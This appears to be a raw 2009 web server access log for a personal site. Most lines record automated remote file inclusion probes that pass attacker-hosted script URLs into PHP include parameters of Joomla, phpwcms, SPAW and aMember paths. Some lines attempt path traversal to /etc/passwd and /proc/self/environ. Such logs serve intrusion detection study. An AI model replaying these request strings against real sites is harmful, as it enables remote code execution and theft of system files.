77.221.130.10 - - [19/May/2009:11:00:51 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:11:00:52 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 100197 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:11:00:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:00:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:11:00:57 -0700] "GET /logs/access_090321.log%20%20/index.php?meio=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [19/May/2009:11:00:57 -0700] "GET /logs/access_081222.log%20%20/index.php?meio=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:01:08 -0700] "GET /logs/access_080605.log//admin/spaw/spaw_control.class.php?spaw_root=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:11:01:08 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:01:11 -0700] "GET /logs/access_080605.log//admin/spaw/spaw_control.class.php?spaw_root=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:11:01:11 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
116.50.189.241 - - [19/May/2009:11:01:15 -0700] "GET /logs/access_080216.log HTTP/1.1" 200 1395697 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:01:20 -0700] "GET /logs/access_080212.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:11:01:24 -0700] "GET /logs/access_081222.log%20%20/index.php?meio=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:01:24 -0700] "GET /logs/access_080402.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:11:01:34 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 42074 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:11:01:36 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 42074 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:11:01:37 -0700] "GET /logs/access_080619.log%20%20/index.php?meio=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.188.206.196 - - [19/May/2009:11:01:47 -0700] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/4.0 (Toread-Crawler/1.1; +http://news.toread.cc/crawler.php)" "www.dmulk.com"
210.188.206.196 - - [19/May/2009:11:01:49 -0700] "GET /logs/access_080807.log HTTP/1.0" 200 1048576 "-" "Mozilla/4.0 (Toread-Crawler/1.1; +http://news.toread.cc/crawler.php)" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:01:55 -0700] "GET /logs/access_080918.log/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:01:55 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:01:55 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:02:17 -0700] "GET ///e404.php?DOCUMENT_ROOT=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:02:17 -0700] "GET /logs/access_081012.log////e404.php?DOCUMENT_ROOT=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:02:17 -0700] "GET /logs////e404.php?DOCUMENT_ROOT=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:11:02:31 -0700] "GET /logs/access_080314.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:11:02:44 -0700] "GET /logs/access_080314.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:11:02:47 -0700] "GET /logs/access_071129.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:11:02:55 -0700] "GET /logs/access_071129.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:03:01 -0700] "GET /logs/access_081008.log////e404.php?DOCUMENT_ROOT=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:01 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:01 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:01 -0700] "GET /logs//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:01 -0700] "GET /include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:02 -0700] "GET /logs/access_080304.log%20%20//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:02 -0700] "GET /logs//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:02 -0700] "GET /include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:02 -0700] "GET /logs/access_080430.log%20%20//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:32 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:32 -0700] "GET /logs/access_080531.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:32 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:03:32 -0700] "GET /logs/access_080212.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.112.31 - - [19/May/2009:11:03:34 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
87.118.112.31 - - [19/May/2009:11:03:34 -0700] "GET /logs///modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
87.118.112.31 - - [19/May/2009:11:03:34 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.yeni.org/hk? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
87.118.112.31 - - [19/May/2009:11:03:34 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.yeni.org/hk? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:40 -0700] "GET /logs/access_081231.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:46 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:46 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:46 -0700] "GET /logs/access_080531.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.110.19.178 - - [19/May/2009:11:03:56 -0700] "GET /logs/access_081231.log//include/print_category.php?setup[use_category]=1&dir=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:59 -0700] "GET /include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:59 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:03:59 -0700] "GET /logs//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:04:03 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:04:05 -0700] "GET /logs/access_080214.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:04:10 -0700] "GET /logs/access_080214.log%20//admin/spaw/spaw_control.class.php?spaw_root=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:04:30 -0700] "GET /logs/access_080212.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:04:40 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:04:40 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:04:43 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:04:46 -0700] "GET /logs/access_080402.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:04:48 -0700] "GET /logs/access_090313.log//?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:04:49 -0700] "GET /logs//?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:11:04:49 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [19/May/2009:11:04:49 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:04:54 -0700] "GET /logs/access_081223.log//?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:05:01 -0700] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:05:01 -0700] "GET /logs/access_080918.log/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:11:05:01 -0700] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:05:02 -0700] "GET /include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:05:03 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:05:03 -0700] "GET /logs//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:05:03 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:05:05 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:05:05 -0700] "GET /logs/access_080918.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:05:05 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:11:05:06 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:11:05:22 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:11:05:22 -0700] "GET /logs/access_080603.log/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:11:05:22 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [19/May/2009:11:05:22 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:05:25 -0700] "GET /logs/access_081012.log%20%20////e404.php?DOCUMENT_ROOT=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [19/May/2009:11:05:34 -0700] "GET /?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 200 42056 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:11:05:35 -0700] "GET /logs/access_081008.log%20%20////e404.php?DOCUMENT_ROOT=http://www.rakkasanwarriors.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [19/May/2009:11:05:53 -0700] "GET /logs/access_080402.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:11:06:04 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:11:06:05 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [19/May/2009:11:06:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [19/May/2009:11:06:20 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [19/May/2009:11:06:20 -0700] "GET /logs/access_080603.log/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [19/May/2009:11:06:20 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:11:06:34 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:11:06:34 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.65.24 - - [19/May/2009:11:06:40 -0700] "GET /blog/index.php/category/uncategorized/ HTTP/1.0" 200 8212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
217.147.29.190 - - [19/May/2009:11:06:59 -0700] "GET /logs/access_080603.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [19/May/2009:11:06:59 -0700] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:07:16 -0700] "GET /logs/access_080131.log/index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:07:16 -0700] "GET /index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.175.180.194 - - [19/May/2009:11:07:16 -0700] "GET /logs/index2.php?s=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:07:39 -0700] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://x.beatz.in/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
162.129.47.11 - - [19/May/2009:11:07:39 -0700] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://x.beatz.in/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:08:13 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:08:13 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:08:13 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:11:08:20 -0700] "GET /logs/access_080923.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:08:27 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:08:27 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:08:27 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.191.103.144 - - [19/May/2009:11:08:31 -0700] "GET /logs/access_080923.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:37 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:38 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:38 -0700] "GET /logs/access_080211.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:11:08:40 -0700] "GET /logs/access_080125.log/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:11:08:40 -0700] "GET /logs/access_081123.log/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.76.47.224 - - [19/May/2009:11:08:41 -0700] "GET /logs/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 100191 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:44 -0700] "GET /logs/access_080923.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:45 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.59.178 - - [19/May/2009:11:08:45 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
